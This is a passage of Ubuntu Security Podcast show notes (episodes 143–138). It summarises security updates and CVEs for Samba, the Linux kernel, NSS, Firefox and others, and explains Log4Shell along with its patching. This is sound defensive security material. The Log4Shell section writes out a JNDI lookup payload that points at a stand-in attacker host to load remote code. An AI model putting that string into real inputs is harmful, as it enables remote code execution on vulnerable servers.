Ubuntu Security Podcast

Ubuntu Security Podcast

By Ubuntu Security TeamTechnology
Download on the App Store

Ubuntu Security Podcast episodes

  • Episode 143
    Overview

    Happy holidays! This week we bring you the first part of a special two-part

    holiday themed feature by Camila from the Ubuntu Security team discussing
    the top cyber threats faced during the holidays.

    Get in contact
    • #ubuntu-security on the Libera.Chat IRC network
    • ubuntu-hardened mailing list
    • Security section on discourse.ubuntu.com
    • @ubuntu_sec on twitter
    • 25 min
    • Episode 142
      Overview

      Just in time for the holidays, Log4Shell comes along to wreck everyone’s

      weekend - so we take a deep dive into the vulnerability that has set the
      internet on fire, plus we cover security updates for BlueZ, Firefox,
      Flatpak and more.

      This week in Ubuntu Security Updates

      27 unique CVEs addressed

      [USN-5183-1] BlueZ vulnerability [00:48]
      • 1 CVEs addressed in Bionic (18.04 LTS)
        • CVE-2019-8922
        • Heap based buffer overflow when handling overly large SDP requests -
        • crash / possible code execution as a result
          [USN-5186-1] Firefox vulnerabilities [01:08]
          • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
            • CVE-2021-43540
            • CVE-2021-43546
            • CVE-2021-43545
            • CVE-2021-43543
            • CVE-2021-43542
            • CVE-2021-43541
            • CVE-2021-43539
            • CVE-2021-43538
            • CVE-2021-43537
            • CVE-2021-43536
            • 95.0
            • [USN-5189-1] GLib vulnerability [01:34]
              • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                • CVE-2021-3800
                • By setting the GLIB_CHARSETALIAS_DIR env var, could then possibly exploit
                • setuid binaries like pkexec which are linked against glib to possibly
                  read root-owned files - fixed to just have glib not read and use this
                  environment variable
                  [USN-5142-3] Samba regression [02:29]
                  • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                    • CVE-2021-3671
                    • CVE-2021-3738
                    • CVE-2021-23192
                    • CVE-2020-25722
                    • CVE-2020-25721
                    • CVE-2020-25719
                    • CVE-2020-25718
                    • CVE-2020-25717
                    • CVE-2016-2124
                    • Episode 138, Episode 141 - yet another upstream regression in Samba due
                    • to the most recent set of security updates which we discussed a month ago
                      in episode 138
                      [USN-5174-2] Samba regression
                      • 4 CVEs addressed in Bionic (18.04 LTS)
                        • CVE-2021-3671
                        • CVE-2020-25722
                        • CVE-2020-25717
                        • CVE-2016-2124
                        • [USN-5191-1] Flatpak vulnerability [02:48]
                          • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                            • CVE-2021-41133
                            • Possible to escape the flatpak sandbox by tricking services running on
                            • the host that they were not in fact communicating with a flatpak
                              sandboxed application but with a regular unconfined application. As such
                              they then wouldn’t restrict the actions which they would perform on
                              behalf of the flatpak’d application and so could allow it to then escape
                              it’s own confinement
                              [USN-5193-1] X.Org X Server vulnerabilities [03:26]
                              • 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                • CVE-2021-4011
                                • CVE-2021-4010
                                • CVE-2021-4009
                                • CVE-2021-4008
                                • 4 different OOB writes that could be triggered by X clients - could then
                                • cause the X server to crash or possible code execution etc
                                • In more recent releases, X runs as a regular user so impact is limited,
                                • and in most recent releases Ubuntu uses Wayland by default so it’s
                                  possible that on modern desktops there is no X server running at all \o/
                                  [USN-5192-1] Apache Log4j 2 vulnerability [04:12]
                                  • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                    • CVE-2021-44228
                                    • [USN-5197-1] Apache Log4j 2 vulnerability
                                      • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                        • CVE-2021-45046
                                        • Goings on in Ubuntu Security Community
                                          Log4Shell explodes the internet [04:20]
                                          • Vuln announced on Twitter late last Thursday / early Friday morning,
                                          • linking to the upstream Github issue of a possible remote code execution
                                            vuln in Apache Log4j 2
                                          • Quickly it became apparent this was a high profile vuln that would affect
                                          • a huge number of software products and have wide reaching consequences
                                          • Over the weekend started being picked up by mainstream news not just the
                                          • security industry
                                          • Since then vendors and distros etc have scrambled to patch the
                                          • vulnerability
                                          • Ubuntu released updates on Monday - 2.15.0 for Ubuntu >= 20.04 LTS and
                                          • otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)
                                          • Stepping back
                                            • What is Log4j?
                                              • Extremely popular and widely used Java package for doing logging
                                              • within applications
                                              • Is the 252nd most popular component in Maven Central repo by download
                                              • volume for November 2021
                                              • Top 0.003% in popularity by downloads
                                              • Also is a dependency in close to 7000 other open source projects - is
                                              • even in the Mars rover’s Ingenuity helicopter
                                                • Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)
                                                • Plus a huge number of other projects:
                                                  • Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
                                                    • Initial reports were this was first seen being exploited in
                                                    • Minecraft
                                                    • Not to mention:
                                                      • Apple iCloud, Steam, Samsung Cloud storage and more
                                                      • What is the vulnerability?
                                                        • Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j
                                                        • JNDI allows Java objects to be referenced externally then loaded and used at runtime
                                                        • JNDI supports different protocols to fetch classes, including LDAP, even DNS etc
                                                        • Log4j supports lookups on variables which can encode a JNDI resource
                                                        • So if you log a variable such as ${jndi:ldap://attacker.com/malware}
                                                        • Log4j will perform the lookup via LDAP to retrieve the Java class at
                                                          that URI and then execute it
                                                        • Remote code execution attacks don’t get any easier than this - esp
                                                        • since Java is write once, run anywhere - there is no architectural
                                                          specific issues like with natively comiler languages like C/C++ etc
                                                        • As such wasn’t surprising to see this given the highest possible CVSS
                                                        • score of 10.0 by ASF
                                                        • How widespread is this issue?
                                                          • As mentioned earlier so many different pieces of software use Log4j
                                                          • and have Log4j embedded within them, it is not just sufficient to say
                                                            update your Ubuntu packaged version of log4j - if you are running
                                                            custom / proprietary Java applications they may likely contain their
                                                            own copy of Log4j2 and you may have to go and patch that directly
                                                          • How to patch manually?
                                                            • The easiest option would be to get an updated version of the
                                                            • application from the original vendor
                                                            • Failing that, could go looking for all log4j2 jar archives and then
                                                            • could extract these (jar’s are zips afterall) and remove the
                                                              offending class directly
                                                              (java/org/apache/logging/log4j/core/lookup/JndiLookup)
                                                            • How is it being exploited?
                                                              • Kids popping Minecraft servers to other adversaries using this for
                                                              • more traditional attacks like deploying cryptominers etc - but given
                                                                how widespread this issue is and how much coverage it has gotten it
                                                                is likely everyone and anyone is looking to actively exploit it
                                                              • Expect we will still be hearing about this for a long time - whether due
                                                              • to more vulns in Log4j2 but also since there are so many devices running
                                                                Java out there and that likely have Log4j as part of that - could be a
                                                                long tail of devices which take a long time (or even never get patched)
                                                              • Could be the basis of the next Mirai style botnet of compromised devices?
                                                              • In all the drama, it turned out there was a second vuln which could still
                                                              • be triggered to cause a least a DoS or possible information leaking /
                                                                exfiltration - so a second upstream release 2.16.0 was done - this is now
                                                                in Ubuntu >= 20.04 LTS as well (USN-5197-1)
                                                              • KnowledgeBase article for this on the Ubuntu wiki too if you want more
                                                              • specific information
                                                                Ubuntu Security Podcast Holiday specials [12:52]
                                                                • Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series
                                                                • on cyber security threats and preparations for the holidays
                                                                • Will be publishing that over the next couple weeks whilst the regular
                                                                • episodes take a break
                                                                  Ubuntu Security Podcast on break [13:37]
                                                                  • Will take a break for a few weeks and be back in early January
                                                                  • Wishing all listeners a safe and happy time if you are celebrating the
                                                                  • holidays - fingers crossed 🤞 there is no more Log4Shell type
                                                                    vulnerabilities that drop during that time and everyone can have a proper
                                                                    break to recharge before 2022
                                                                  • We’ll be back then to bring you all the news for Ubuntu Security again
                                                                  • Get in contact
                                                                    • #ubuntu-security on the Libera.Chat IRC network
                                                                    • ubuntu-hardened mailing list
                                                                    • Security section on discourse.ubuntu.com
                                                                    • @ubuntu_sec on twitter
                                                                    • 15 min
                                                                    • Episode 141
                                                                      Overview

                                                                      A preview of some things to come for the Ubuntu Security Podcast plus we

                                                                      cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
                                                                      and more.

                                                                      This week in Ubuntu Security Updates

                                                                      38 unique CVEs addressed

                                                                      [USN-5174-1] Samba vulnerabilities [00:58]
                                                                      • 4 CVEs addressed in Bionic (18.04 LTS)
                                                                        • CVE-2021-3671
                                                                        • CVE-2020-25722
                                                                        • CVE-2020-25717
                                                                        • CVE-2016-2124
                                                                        • Few weeks ago published Samba updates for a range of vulns - mentioned in
                                                                        • Episode 139 the difficulties involved in patching older Samba versions
                                                                          like 4.7.6 as used in Ubuntu 18.04 - backports of patches for the more
                                                                          severe vulnerabilities including the ability for authenticated attackers
                                                                          to escalate privileges to root on domain machines and others
                                                                          [USN-5142-2] Samba regressions [02:06]
                                                                          • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                            • CVE-2021-3671
                                                                            • CVE-2021-3738
                                                                            • CVE-2021-23192
                                                                            • CVE-2020-25722
                                                                            • CVE-2020-25721
                                                                            • CVE-2020-25719
                                                                            • CVE-2020-25718
                                                                            • CVE-2020-25717
                                                                            • CVE-2016-2124
                                                                            • Original upstream patches caused a bunch of regressions - once upstream
                                                                            • subsequently fixed these, we then updated our backports to include those
                                                                              regression fixes
                                                                            • How soon to ship vuln fixes?
                                                                            • [USN-5171-1] Long Range ZIP vulnerabilities [03:22]
                                                                              • 9 CVEs addressed in Bionic (18.04 LTS)
                                                                                • CVE-2018-5786
                                                                                • CVE-2018-5747
                                                                                • CVE-2018-5650
                                                                                • CVE-2018-11496
                                                                                • CVE-2018-10685
                                                                                • CVE-2017-9929
                                                                                • CVE-2017-9928
                                                                                • CVE-2017-8846
                                                                                • CVE-2017-8844
                                                                                • Compression tool optimised to achieve better performance on larger files
                                                                                • Results of fuzzing by various researchers over time - AFL
                                                                                • 4 UAFs, 2 stack buffer overflows, 2 infinite loop, 1 heap buffer overflow
                                                                                • [USN-5172-1] uriparser vulnerabilities [03:56]
                                                                                  • 4 CVEs addressed in Bionic (18.04 LTS)
                                                                                    • CVE-2018-20721
                                                                                    • CVE-2018-19200
                                                                                    • CVE-2018-19199
                                                                                    • CVE-2018-19198
                                                                                    • More fuzzing results -> Google AutoFuzz - seems to manage oss-fuzz etc
                                                                                    • OOB write, integer overflow, OOB read, NULL ptr deref
                                                                                    • [USN-5173-1] libmodbus vulnerabilities [04:36]
                                                                                      • 2 CVEs addressed in Bionic (18.04 LTS)
                                                                                        • CVE-2019-14463
                                                                                        • CVE-2019-14462
                                                                                        • 1 vuln originally - OOB read on certain input - patch for this however
                                                                                        • contained a typo which then introduced a second vuln on a subset of the
                                                                                          original input - second CVE assigned for that - both now fixed
                                                                                          [USN-5170-1] MariaDB vulnerability [05:13]
                                                                                          • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                            • CVE-2021-35604
                                                                                            • Latest upstream point releases:
                                                                                              • 10.5.13 -> 21.04, 21.10
                                                                                              • 10.3.32 -> 20.04
                                                                                              • As usual not much details on the vuln (MariaDB fork of MySQL, maintained
                                                                                              • by Oracle who don’t provide a lot of specific details in their
                                                                                                vulnerability reports)
                                                                                                [USN-5178-1] Django vulnerability [06:04]
                                                                                                • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                  • CVE-2021-44420
                                                                                                  • Failed to handle URLs with embedded trailing newlines - newline would
                                                                                                  • cause the URL to not match the existing URL path-based access controls so
                                                                                                    could bypass those
                                                                                                    [USN-5179-1] BusyBox vulnerabilities [06:33]
                                                                                                    • 10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                      • CVE-2021-42386
                                                                                                      • CVE-2021-42385
                                                                                                      • CVE-2021-42384
                                                                                                      • CVE-2021-42382
                                                                                                      • CVE-2021-42381
                                                                                                      • CVE-2021-42380
                                                                                                      • CVE-2021-42379
                                                                                                      • CVE-2021-42378
                                                                                                      • CVE-2021-42374
                                                                                                      • CVE-2021-28831
                                                                                                      • Busybox implements a lot of standard unix utilities in a single binary
                                                                                                      • UAF / OOB write when decompressing crafted gzip files
                                                                                                      • Heap OOB on when decompressing crafted lzma
                                                                                                      • Lots of UAFs in awk impl
                                                                                                      • [USN-5180-1] Mailman vulnerability [07:37]
                                                                                                        • 1 CVEs addressed in Bionic (18.04 LTS)
                                                                                                          • CVE-2021-44227
                                                                                                          • Wouldn’t validate that a CSRF token used for admin pages was actually
                                                                                                          • issued for that context - so a regular list user could take their own
                                                                                                            CSRF token, craft a URL for the admin user with this token and if the
                                                                                                            admin user visited that then they could evade the inteded CSRF
                                                                                                            protections - so could say change the admindb password etc
                                                                                                            [USN-5168-4] NSS regression [08:47]
                                                                                                            • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
                                                                                                              • CVE-2021-43527
                                                                                                              • Typo in backported patch could cause NSS to fail in some circumstances
                                                                                                              • and cause an SSL session to fail (DoS)
                                                                                                                Goings on in Ubuntu Security Community
                                                                                                                Preview of some upcoming content and changes [09:26]
                                                                                                                Get in contact
                                                                                                                • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                • ubuntu-hardened mailing list
                                                                                                                • Security section on discourse.ubuntu.com
                                                                                                                • @ubuntu_sec on twitter
                                                                                                                • 11 min
                                                                                                                • Episode 140
                                                                                                                  Overview

                                                                                                                  A gnarly old bug in NSS is unearthed, plus we cover security updates for

                                                                                                                  ICU, the Linux kernel and ImageMagick as well.

                                                                                                                  This week in Ubuntu Security Updates

                                                                                                                  20 unique CVEs addressed

                                                                                                                  [USN-5156-1] ICU vulnerability [00:40]
                                                                                                                  • 1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                    • CVE-2021-30535
                                                                                                                    • Double free - originally reported in chromium but is actually in embedded
                                                                                                                    • copy of icu - able to be triggered on crafted content to icu, in the case
                                                                                                                      of chromium this could be via a crafted webpage or similar so not too
                                                                                                                      dissimilar to usual web handling issues - memory corruption -> code
                                                                                                                      execution (but within chromium sandbox in that case)
                                                                                                                      [USN-5158-1] ImageMagick vulnerabilities [01:25]
                                                                                                                      • 5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                        • CVE-2021-20313
                                                                                                                        • CVE-2021-20312
                                                                                                                        • CVE-2021-20309
                                                                                                                        • CVE-2021-20246
                                                                                                                        • CVE-2021-20244
                                                                                                                        • DoS vulns from untrusted inputs -> most all result in a divide by zero ->
                                                                                                                        • exception -> application crash
                                                                                                                          [USN-5161-1] Linux kernel vulnerabilities [01:55]
                                                                                                                          • 4 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
                                                                                                                            • CVE-2021-42252
                                                                                                                            • CVE-2021-3764
                                                                                                                            • CVE-2021-3744
                                                                                                                            • CVE-2021-3655
                                                                                                                            • 5.11 kernel (generic hirsute + clouds, raspi, focal hwe etc)
                                                                                                                            • armhf specific issue (Aspeed LPC bus controller) - local user OOB write
                                                                                                                            • -> crash / code-exec
                                                                                                                            • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
                                                                                                                            • SCTP OOB read - incoming packets
                                                                                                                            • [USN-5162-1] Linux kernel vulnerabilities [03:13]
                                                                                                                              • 5 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
                                                                                                                                • CVE-2021-43057
                                                                                                                                • CVE-2021-42252
                                                                                                                                • CVE-2021-3764
                                                                                                                                • CVE-2021-3744
                                                                                                                                • CVE-2021-3655
                                                                                                                                • 5.13 (impish, focal OEM)
                                                                                                                                • same as above plus SELinux specific issue around handling of task
                                                                                                                                • credentials -> UAF -> memory corruption -> crash / code execution (Jann
                                                                                                                                  Horn @ GPZ)
                                                                                                                                  [USN-5163-1] Linux kernel vulnerabilities [03:59]
                                                                                                                                  • 4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                    • CVE-2021-3764
                                                                                                                                    • CVE-2021-3744
                                                                                                                                    • CVE-2021-37159
                                                                                                                                    • CVE-2021-3655
                                                                                                                                    • 5.4 (focal, bionic HWE)
                                                                                                                                    • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
                                                                                                                                    • SCTP OOB read - incoming packets
                                                                                                                                    • USB Option High Speed Mobile driver -> UAF if unplug device before fully
                                                                                                                                    • registered - local attacker could trigger - crash / code-exec
                                                                                                                                      [USN-5164-1] Linux kernel vulnerabilities [04:50]
                                                                                                                                      • 3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                        • CVE-2021-3764
                                                                                                                                        • CVE-2021-3744
                                                                                                                                        • CVE-2021-37159
                                                                                                                                        • 4.15 (bionic, xenial ESM, trusty ESM - azure)
                                                                                                                                        • AMD cryptographic coprocessor driver memory leaks -> DoS (Episode 138)
                                                                                                                                        • SCTP OOB read - incoming packets
                                                                                                                                        • [USN-5165-1] Linux kernel (OEM) vulnerabilities [05:13]
                                                                                                                                          • 7 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                            • CVE-2021-43389
                                                                                                                                            • CVE-2021-43267
                                                                                                                                            • CVE-2021-43056
                                                                                                                                            • CVE-2021-42739
                                                                                                                                            • CVE-2021-42327
                                                                                                                                            • CVE-2021-3772
                                                                                                                                            • CVE-2021-3760
                                                                                                                                            • Mix of vulns in various drivers
                                                                                                                                              • UAF in NFC, DoS due to SCTP logic error, OOB in AMD GPU debugfs (need
                                                                                                                                              • root), FireDTV Firewire OOB write, POWER8 specific KVM issue (guest ->
                                                                                                                                                host crash), Transparent Inter-Process Communication (TIPC) OOB write,
                                                                                                                                                ISDN CAPI subsystem OOB write
                                                                                                                                                [USN-5168-1, USN-5168-2, USN-5168-3] NSS and Thunderbird vulnerability [06:08]
                                                                                                                                                • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                  • CVE-2021-43527
                                                                                                                                                  • New NSS vulnerability (CVE-2021-43527) discussion [06:17]
                                                                                                                                                    • Discovered by Tavis Ormandy at GPZ
                                                                                                                                                    • NSS is a very old project, code in question has existed since 2003 and
                                                                                                                                                    • been exploitable since at least 2012 when it was refactored
                                                                                                                                                    • Does a direct memcpy of an attacker controlled amount of data into a
                                                                                                                                                    • fixed size buffer without specifically checking whether the data is too
                                                                                                                                                      large - classic heap-based buffer overflow
                                                                                                                                                    • Object on the heap also contains function pointer which then get called
                                                                                                                                                    • so relatively easy to get control flow and code execution as a result
                                                                                                                                                    • NSS was one of the first projects added to oss-fuzz (Google), Mozilla do
                                                                                                                                                    • own fuzzing as well, extensive testsuite and uses ASAN for internal
                                                                                                                                                      builds
                                                                                                                                                    • Uses Coverity but this didn’t detect it either
                                                                                                                                                    • Existing fuzzing and unit tests had test cases which could reach this
                                                                                                                                                    • code but failed to find it for a number of reasons:
                                                                                                                                                      • Fuzz input is limited to 10k - but to overflow need at least 16,384
                                                                                                                                                      • bytes so fuzzing couldn’t have caught this
                                                                                                                                                      • Individual code paths fuzzed but not so much end-to-end systematic
                                                                                                                                                      • testing - so nothing which would try generating say large inputs in
                                                                                                                                                        this case - does occur for other code-paths though
                                                                                                                                                      • Existing metrics almalgate results from all fuzzers - so hard to tell
                                                                                                                                                      • how well a piece of code has been fuzzed as it may have been using a
                                                                                                                                                        fuzzed which may never trigger relevant input to find bugs like this
                                                                                                                                                      • Seemingly well tested, well fuzzed code is not enough - need to look
                                                                                                                                                      • systematically and quantify how complete the coverage is not just in
                                                                                                                                                        terms of LOC or inputs used, but also boundary conditions etc
                                                                                                                                                      • https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html
                                                                                                                                                      • Get in contact
                                                                                                                                                        • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                        • ubuntu-hardened mailing list
                                                                                                                                                        • Security section on discourse.ubuntu.com
                                                                                                                                                        • @ubuntu_sec on twitter
                                                                                                                                                        • 13 min
                                                                                                                                                        • Episode 139
                                                                                                                                                          Overview

                                                                                                                                                          This week we put out a call for testing and feedback on proposed Samba

                                                                                                                                                          updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman,
                                                                                                                                                          Thunderbird, LibreOffice, BlueZ and more.

                                                                                                                                                          This week in Ubuntu Security Updates

                                                                                                                                                          15 unique CVEs addressed

                                                                                                                                                          [USN-5150-1] OpenEXR vulnerability [00:39]
                                                                                                                                                          • 1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                            • CVE-2021-3941
                                                                                                                                                            • oss-fuzz -> div-by-zero with crafted image using YUV-encoded colors
                                                                                                                                                            • [USN-5151-1] Mailman vulnerabilities [00:58]
                                                                                                                                                              • 2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
                                                                                                                                                                • CVE-2021-43332
                                                                                                                                                                • CVE-2021-43331
                                                                                                                                                                • Similar to vulns in last Mailman update (Episode 136)
                                                                                                                                                                • [USN-5152-1] Thunderbird vulnerabilities [01:27]
                                                                                                                                                                  • 5 CVEs addressed in Impish (21.10)
                                                                                                                                                                    • CVE-2021-38509
                                                                                                                                                                    • CVE-2021-38507
                                                                                                                                                                    • CVE-2021-38506
                                                                                                                                                                    • CVE-2021-38504
                                                                                                                                                                    • CVE-2021-38503
                                                                                                                                                                    • 91.3.1
                                                                                                                                                                    • Usual web framework issues (HTML email etc) - one TB specific issue
                                                                                                                                                                    • around the ability to force TB into full-screen via web content
                                                                                                                                                                      navigation - could then spoof usual chrome which is hidden in fullscreen
                                                                                                                                                                      and get user input unexpectedly
                                                                                                                                                                      [USN-5153-1] LibreOffice vulnerabilities [02:23]
                                                                                                                                                                      • 2 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                        • CVE-2021-25634
                                                                                                                                                                        • CVE-2021-25633
                                                                                                                                                                        • 2 issues around interpretation / display of details for signed
                                                                                                                                                                        • documents - could inject a new timestamp and get this shown as the time
                                                                                                                                                                          the document was signed, or could cause to show incorrect details for a
                                                                                                                                                                          signed document by adding details from another certificate
                                                                                                                                                                        • Too invasive to backport for 18.04 LTS
                                                                                                                                                                        • [USN-5154-1] FreeRDP vulnerabilities [03:28]
                                                                                                                                                                          • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                            • CVE-2021-41160
                                                                                                                                                                            • CVE-2021-41159
                                                                                                                                                                            • OOB write in client if sent malicious data from server -> crash / code-exec
                                                                                                                                                                            • if using a gateway and the RPC protocol, would fail to validate input ->
                                                                                                                                                                            • malicious gateway could then corrupt client memory -> crash / code-exec
                                                                                                                                                                              [USN-5155-1] BlueZ vulnerabilities [04:07]
                                                                                                                                                                              • 3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                • CVE-2021-43400
                                                                                                                                                                                • CVE-2021-41229
                                                                                                                                                                                • CVE-2021-3658
                                                                                                                                                                                • Would save and restore discoverable status on power down / power up - so
                                                                                                                                                                                • if powered down when discoverable would power up as discoverable
                                                                                                                                                                                • UAF if gatt client disconnected during a particular write operation with
                                                                                                                                                                                • dbus - so would likely need bad luck or cooperation between a local
                                                                                                                                                                                  application / user and the device to trigger
                                                                                                                                                                                • Memory leak in handling of SDP devices -> DoS
                                                                                                                                                                                • Goings on in Ubuntu Security Community
                                                                                                                                                                                  Samba updates available for testing for Ubuntu 18.04 LTS [05:24]
                                                                                                                                                                                  • https://discourse.ubuntu.com/t/samba-update-for-ubuntu-18-04-lts-bionic/25408
                                                                                                                                                                                  • Episode 138 discussed difficulties in handling large security updates for
                                                                                                                                                                                  • ageing software
                                                                                                                                                                                  • Backport ~700 patches (with potential regressions) or backport newer
                                                                                                                                                                                  • version, possibly breaking things in the process due to new features /
                                                                                                                                                                                    changes in behaviour etc (plus incompatibilities with other software in
                                                                                                                                                                                    Ubuntu archive)
                                                                                                                                                                                  • Upstream released
                                                                                                                                                                                  • Contains fixes for the most severe CVEs from the most recent updates for
                                                                                                                                                                                  • Samba (USN-5142-1) - CVE-2016-2124, CVE-2020-25717, CVE-2020-25722,
                                                                                                                                                                                    CVE-2021-3671
                                                                                                                                                                                    Get in contact
                                                                                                                                                                                    • #ubuntu-security on the Libera.Chat IRC network
                                                                                                                                                                                    • ubuntu-hardened mailing list
                                                                                                                                                                                    • Security section on discourse.ubuntu.com
                                                                                                                                                                                    • @ubuntu_sec on twitter
                                                                                                                                                                                    • 8 min
                                                                                                                                                                                    • Episode 138
                                                                                                                                                                                      Overview

                                                                                                                                                                                      This week we discuss some of the challenges and trade-offs encountered when

                                                                                                                                                                                      providing security support for ageing software, plus we discuss security
                                                                                                                                                                                      updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.

                                                                                                                                                                                      This week in Ubuntu Security Updates

                                                                                                                                                                                      42 unique CVEs addressed

                                                                                                                                                                                      [USN-5138-1] python-py vulnerability [00:38]
                                                                                                                                                                                      • 1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                        • CVE-2020-29651
                                                                                                                                                                                        • Python library providing path handling, config file parsing and other
                                                                                                                                                                                        • features which are now in standard lib or other packages - has been
                                                                                                                                                                                          deprecated
                                                                                                                                                                                        • ReDoS against path handling code (regex with catastrophic backtracking)
                                                                                                                                                                                        • [USN-5139-1] Linux kernel (OEM 5.10) vulnerabilities [01:25]
                                                                                                                                                                                          • 7 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                            • CVE-2021-43389
                                                                                                                                                                                            • CVE-2021-43056
                                                                                                                                                                                            • CVE-2021-41864
                                                                                                                                                                                            • CVE-2021-3760
                                                                                                                                                                                            • CVE-2021-3764
                                                                                                                                                                                            • CVE-2021-3744
                                                                                                                                                                                            • CVE-2021-3655
                                                                                                                                                                                            • Power8 specific KVM issue -> guest can crash host -> DoS
                                                                                                                                                                                            • AMD cryptographic coprocessor driver memory leaks -> DoS
                                                                                                                                                                                            • eBPF integer overflow -> DoS / code-exec
                                                                                                                                                                                            • NFC UAF
                                                                                                                                                                                            • SCTP info leak
                                                                                                                                                                                            • [USN-5140-1] Linux kernel (OEM 5.14) vulnerabilities [02:12]
                                                                                                                                                                                              • 3 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                • CVE-2021-41864
                                                                                                                                                                                                • CVE-2021-3764
                                                                                                                                                                                                • CVE-2021-3744
                                                                                                                                                                                                • eBPF integer overflow -> DoS / code-exec
                                                                                                                                                                                                • AMD cryptographic coprocessor driver memory leaks -> DoS
                                                                                                                                                                                                • [USN-5137-2] Linux kernel vulnerabilities [02:33]
                                                                                                                                                                                                  • 9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                    • CVE-2021-3759
                                                                                                                                                                                                    • CVE-2021-3753
                                                                                                                                                                                                    • CVE-2021-3743
                                                                                                                                                                                                    • CVE-2021-3739
                                                                                                                                                                                                    • CVE-2021-35477
                                                                                                                                                                                                    • CVE-2021-34556
                                                                                                                                                                                                    • CVE-2021-3428
                                                                                                                                                                                                    • CVE-2020-36385
                                                                                                                                                                                                    • CVE-2019-19449
                                                                                                                                                                                                    • 5.4 (focal bluefield / oracle, bionic oracle / gke)
                                                                                                                                                                                                    • [LSN-0082-1] Linux kernel vulnerability [03:05]
                                                                                                                                                                                                      • 4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
                                                                                                                                                                                                        • CVE-2021-3715
                                                                                                                                                                                                        • CVE-2021-3444
                                                                                                                                                                                                        • CVE-2020-29661
                                                                                                                                                                                                        • CVE-2020-29660
                                                                                                                                                                                                        • 2 high priority vulns from GPZ (Episode 138) in tty subsystem and 1 in
                                                                                                                                                                                                        • BPF verifier - code-exec -> privesc
                                                                                                                                                                                                        • UAF in IPv4 networking routing handling
                                                                                                                                                                                                        • [USN-5141-1] Firejail vulnerability [03:48]
                                                                                                                                                                                                          • 1 CVEs addressed in Focal (20.04 LTS)
                                                                                                                                                                                                            • CVE-2021-26910
                                                                                                                                                                                                            • TOCTOU race condition in handling of overlayfs - decided to drop support
                                                                                                                                                                                                            • for overlayfs since was deemed - thanks to Reiner Herrmann for providing
                                                                                                                                                                                                              this update
                                                                                                                                                                                                              [USN-5142-1] Samba vulnerabilities [04:43]
                                                                                                                                                                                                              • 9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
                                                                                                                                                                                                                • CVE-2021-3671
                                                                                                                                                                                                                • CVE-2021-3738
                                                                                                                                                                                                                • CVE-2021-23192
                                                                                                                                                                                                                • CVE-2020-25722
                                                                                                                                                                                                                • CVE-2020-25721
                                                                                                                                                                                                                • CVE-2020-25719
                                                                                                                                                                                                                • CVE-2020-25718
                                                                                                                                                                                                                • CVE-2020-25717
                                                                                                                                                                                                                • CVE-2016-2124
                                                                                                                                                                                                                • Raft of issues including unauthenticated users able to become root on
                                                                                                                                                                                                                • domain members since Samba might incorrectly map local users to domain
                                                                                                                                                                                                                  members, plus incorrect handling of Kerberos tickets such that delegated
                                                                                                                                                                                                                  users could become domain admin by confusing Samba on which user a ticket
                                                                                                                                                                                                                  represented
                                                                                                                                                                                                                • Memory corruption issues too
                                                                                                                                                                                                                • In particular the fix to correctly map local to domain users results in
                                                                                                                                                                                                                • changed behaviour regarding matching AD users to local users - would
